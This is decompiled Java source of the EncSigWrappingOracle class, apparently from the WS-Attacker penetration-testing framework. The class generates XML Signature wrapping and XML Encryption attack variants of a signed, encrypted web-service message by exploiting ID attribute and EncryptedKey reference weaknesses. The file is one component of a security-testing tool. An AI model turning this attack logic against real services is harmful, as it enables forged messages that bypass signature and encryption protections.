/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles;

import java.util.ArrayList;
import java.util.List;
import org.apache.log4j.Logger;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import wsattacker.library.schemaanalyzer.SchemaAnalyzer;
import wsattacker.library.signatureWrapping.util.exception.InvalidPayloadException;
import wsattacker.library.signatureWrapping.util.exception.InvalidWeaknessException;
import wsattacker.library.signatureWrapping.xpath.weakness.util.WeaknessLog;
import wsattacker.library.signatureWrapping.xpath.wrapping.WrappingOracle;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.WrappingOracleIF;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.util.WrapOracleHelper;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.AbstractEncryptionWeakness;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.FactoryWeakness;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.WeaknessType;
import wsattacker.library.xmlencryptionattack.detectionengine.detectionmanager.DetectFilterEnum;
import wsattacker.library.xmlencryptionattack.detectionengine.detectionstreams.DetectionReport;
import wsattacker.library.xmlencryptionattack.detectionengine.filter.info.SignatureInfo;
import wsattacker.library.xmlencryptionattack.encryptedelements.AbstractEncryptionElement;
import wsattacker.library.xmlencryptionattack.encryptedelements.AbstractRefElement;
import wsattacker.library.xmlencryptionattack.encryptedelements.ElementAttackProperties;
import wsattacker.library.xmlencryptionattack.encryptedelements.data.EncryptedDataElement;
import wsattacker.library.xmlencryptionattack.encryptedelements.key.DataReferenceElement;
import wsattacker.library.xmlencryptionattack.encryptedelements.key.EncryptedKeyElement;
import wsattacker.library.xmlencryptionattack.encryptedelements.key.KeyReferenceElement;
import wsattacker.library.xmlutilities.dom.DomUtilities;

public class EncSigWrappingOracle
extends WrappingOracle
implements WrappingOracleIF {
    private final AbstractEncryptionElement m_EncPay;
    private final ElementAttackProperties m_EncPayAttackProp;
    private final int m_MaxSigWrappPossibilites;
    private int m_MaxPossibilites;
    public static final Logger LOG = Logger.getLogger(EncSigWrappingOracle.class);
    private final List<AbstractEncryptionWeakness> m_EncryptionWeakness = new ArrayList<AbstractEncryptionWeakness>();

    public EncSigWrappingOracle(AbstractEncryptionElement encPay, DetectionReport detRep, SchemaAnalyzer schemaAnalyser) throws InvalidPayloadException, InvalidWeaknessException {
        super(detRep.getRawFile(), ((SignatureInfo)detRep.getDetectionInfo(DetectFilterEnum.SIGNATUREFILTER)).getUsedPayloads(), schemaAnalyser);
        SignatureInfo sigInfo = (SignatureInfo)detRep.getDetectionInfo(DetectFilterEnum.SIGNATUREFILTER);
        this.m_EncPay = encPay;
        this.m_MaxPossibilites = this.m_MaxSigWrappPossibilites = super.maxPossibilities();
        if (null == this.m_EncPay) {
            LOG.error((Object)"Error: No encryption element detected in EncSigWrappingOracle");
        }
        this.m_EncPayAttackProp = this.m_EncPay.getAttackProperties();
        if (null == this.m_EncPayAttackProp) {
            LOG.error((Object)"Error: No Attack Properties set for Payload in EncSigWrappingOracle");
        }
        if (!sigInfo.isSignature()) {
            LOG.error((Object)"No signature detected -> no wrapping-attack needed");
        }
        this.initWeaknessesOfEncKey();
        this.initWeaknessesOfEncDataOnly();
    }

    private void initWeaknessesOfEncDataOnly() throws InvalidWeaknessException, IllegalArgumentException {
        int signMode = 0;
        if (this.m_EncPay instanceof EncryptedDataElement && this.m_EncPayAttackProp.isSigned()) {
            signMode = this.m_EncPayAttackProp.getSignMode();
            if (0 < (0x10 & signMode) && !this.m_EncPay.getIdValue().equals("")) {
                this.setEncryptionIdWeakness(this.m_EncPay, null);
            } else {
                LOG.info((Object)"No encryption Id weaknesses: Signature Wrapping Oracle handling");
            }
        }
    }

    private void initWeaknessesOfEncKey() throws IllegalArgumentException, InvalidWeaknessException {
        int signMode = 0;
        if (this.m_EncPay instanceof EncryptedKeyElement) {
            int idxEncDataPay = ((EncryptedKeyElement)this.m_EncPay).getWrappingEncDataIndex();
            List<AbstractRefElement> encRefs = ((EncryptedKeyElement)this.m_EncPay).getReferenceElementList();
            if (encRefs.get(idxEncDataPay) instanceof DataReferenceElement) {
                EncryptedDataElement encDataRef = ((DataReferenceElement)encRefs.get(idxEncDataPay)).getRefEncData();
                ElementAttackProperties attackProps = encDataRef.getAttackProperties();
                if (attackProps.isSigned()) {
                    signMode = attackProps.getSignMode();
                    if (0 < (0x10 & signMode)) {
                        this.setEncryptionIdWeakness(encDataRef, (EncryptedKeyElement)this.m_EncPay);
                    } else if (0 == signMode) {
                        this.setEncryptedKeyRefWeakness(encDataRef, (EncryptedKeyElement)this.m_EncPay);
                    }
                }
            } else if (encRefs.get(idxEncDataPay) instanceof KeyReferenceElement) {
                throw new IllegalArgumentException("keyreference not supported yet!");
            }
            if (this.m_EncPayAttackProp.isSigned() && 0 < (0x10 & (signMode = this.m_EncPayAttackProp.getSignMode()))) {
                this.setEncryptionIdWeakness(this.m_EncPay, (EncryptedKeyElement)this.m_EncPay);
            }
        }
    }

    @Override
    public Document getPossibility(int index) throws InvalidWeaknessException {
        WeaknessLog.clean();
        LOG.info((Object)("Creating Wrapping Possibility " + index + " of (" + this.m_MaxPossibilites + "-1)"));
        int weakPropIdx = 0;
        Element payElement = null;
        Element encKeyPay = null;
        Document attackDocument = super.getPossibility(index % this.m_MaxSigWrappPossibilites);
        if (this.m_EncPay instanceof EncryptedKeyElement) {
            int idxEncDataPay = ((EncryptedKeyElement)this.m_EncPay).getWrappingEncDataIndex();
            List<AbstractRefElement> encRefs = ((EncryptedKeyElement)this.m_EncPay).getReferenceElementList();
            if (encRefs.get(idxEncDataPay) instanceof DataReferenceElement) {
                EncryptedDataElement encDataRef = ((DataReferenceElement)encRefs.get(idxEncDataPay)).getRefEncData();
                ElementAttackProperties attackProps = encDataRef.getAttackProperties();
                if (attackProps.isSigned()) {
                    int possibility = index / this.m_MaxSigWrappPossibilites % this.m_EncryptionWeakness.get(weakPropIdx).getPossibleNumWeaks();
                    payElement = DomUtilities.findCorrespondingElement((Document)attackDocument, (Element)attackProps.getWrappingPayloadElement());
                    attackProps.setAttackPayloadElement(payElement);
                    encKeyPay = this.m_EncPayAttackProp.isSigned() ? DomUtilities.findCorrespondingElement((Document)attackDocument, (Element)this.m_EncPayAttackProp.getWrappingPayloadElement()) : DomUtilities.findCorrespondingElement((Document)attackDocument, (Element)this.m_EncPay.getEncryptedElement());
                    this.m_EncPayAttackProp.setAttackPayloadElement(encKeyPay);
                    this.m_EncryptionWeakness.get(weakPropIdx).abuseWeakness(possibility, encKeyPay, payElement);
                    ++weakPropIdx;
                }
            } else if (encRefs.get(idxEncDataPay) instanceof KeyReferenceElement) {
                throw new IllegalArgumentException("keyreference not supported yet!");
            }
            if (this.m_EncPayAttackProp.isSigned() && 0 < (0x10 & this.m_EncPayAttackProp.getSignMode())) {
                int possibility = index % this.m_EncryptionWeakness.get(weakPropIdx).getPossibleNumWeaks();
                index /= this.m_EncryptionWeakness.get(weakPropIdx).getPossibleNumWeaks();
                if (null == encKeyPay) {
                    encKeyPay = DomUtilities.findCorrespondingElement((Document)attackDocument, (Element)this.m_EncPayAttackProp.getWrappingPayloadElement());
                    this.m_EncPayAttackProp.setAttackPayloadElement(encKeyPay);
                }
                this.m_EncryptionWeakness.get(weakPropIdx).abuseWeakness(possibility, null, encKeyPay);
                ++weakPropIdx;
            }
        }
        this.handleEncDataOnly(index, weakPropIdx, attackDocument);
        return attackDocument;
    }

    private void handleEncDataOnly(int index, int weakPropIdx, Document attackDocument) throws IllegalArgumentException {
        Element payElement = null;
        if (this.m_EncPay instanceof EncryptedDataElement && this.m_EncPayAttackProp.isSigned() && 0 < (0x10 & this.m_EncPayAttackProp.getSignMode())) {
            payElement = DomUtilities.findCorrespondingElement((Document)attackDocument, (Element)this.m_EncPayAttackProp.getWrappingPayloadElement());
            if (null == payElement) {
                throw new IllegalArgumentException("Err: payload is null");
            }
            this.m_EncPayAttackProp.setAttackPayloadElement(payElement);
            WrapOracleHelper.handleEncKeyInEncData((EncryptedDataElement)this.m_EncPay);
            if (!this.m_EncryptionWeakness.isEmpty()) {
                int possibility = index / this.m_MaxSigWrappPossibilites % this.m_EncryptionWeakness.get(weakPropIdx).getPossibleNumWeaks();
                this.m_EncryptionWeakness.get(weakPropIdx).abuseWeakness(possibility, null, payElement);
                ++weakPropIdx;
            }
        }
    }

    private void setMaxPossibilites(int numberOfPossibilites, Element payElement) {
        if (numberOfPossibilites > 0) {
            this.m_MaxPossibilites = this.m_MaxPossibilites == 0 ? numberOfPossibilites : this.m_MaxPossibilites * numberOfPossibilites;
        } else {
            LOG.info((Object)("No Extensionpoints for " + payElement.getNodeName() + " detected / Skipping."));
        }
    }

    @Override
    public int maxPossibilities() {
        return this.m_MaxPossibilites;
    }

    private void setEncryptionIdWeakness(AbstractEncryptionElement encPay, EncryptedKeyElement encKey) throws InvalidWeaknessException {
        AbstractEncryptionWeakness encAttrWeak = FactoryWeakness.generateWeakness(WeaknessType.ATTR_ID_WEAKNESS, encPay, encKey);
        this.setMaxPossibilites(encAttrWeak.getPossibleNumWeaks(), encPay.getEncryptedElement());
        this.m_EncryptionWeakness.add(encAttrWeak);
    }

    private void setEncryptedKeyRefWeakness(AbstractEncryptionElement encPay, EncryptedKeyElement encKey) throws InvalidWeaknessException {
        AbstractEncryptionWeakness encAttrWeak = FactoryWeakness.generateWeakness(WeaknessType.ENCKEY_REF_WEAKNESS, encPay, encKey);
        this.setMaxPossibilites(encAttrWeak.getPossibleNumWeaks(), encPay.getEncryptedElement());
        this.m_EncryptionWeakness.add(encAttrWeak);
    }

    @Override
    public void addAdditionalEncryptionWeakness(AbstractEncryptionWeakness addWeak) {
        throw new UnsupportedOperationException("Not supported yet.");
    }
}

